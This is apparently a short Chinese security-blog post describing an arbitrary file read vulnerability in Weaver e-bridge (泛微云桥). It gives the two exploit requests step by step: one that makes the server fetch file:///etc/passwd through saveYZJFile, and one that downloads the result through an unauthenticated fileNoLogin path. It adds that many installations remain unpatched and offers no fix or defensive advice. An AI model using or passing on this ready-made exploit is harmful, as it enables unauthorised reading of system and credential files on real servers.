泛微云桥 e-bridge 任意文件读取漏洞

  • A+
所属分类:安全文章

漏洞影响范围

几乎影响2018-2019全版本

漏洞利用过程

发起GET请求,请求参数如下

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

泛微云桥 e-bridge 任意文件读取漏洞

再次发起GET请求,请求参数如下,3e2598b16871455286ebf95c3e8e118c是上面的reponse数据包的

/file/fileNoLogin/3e2598b16871455286ebf95c3e8e118c

泛微云桥 e-bridge 任意文件读取漏洞

漏洞提示

目前有很多并未修复漏洞 !

泛微云桥 e-bridge 任意文件读取漏洞

泛微云桥 e-bridge 任意文件读取漏洞


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: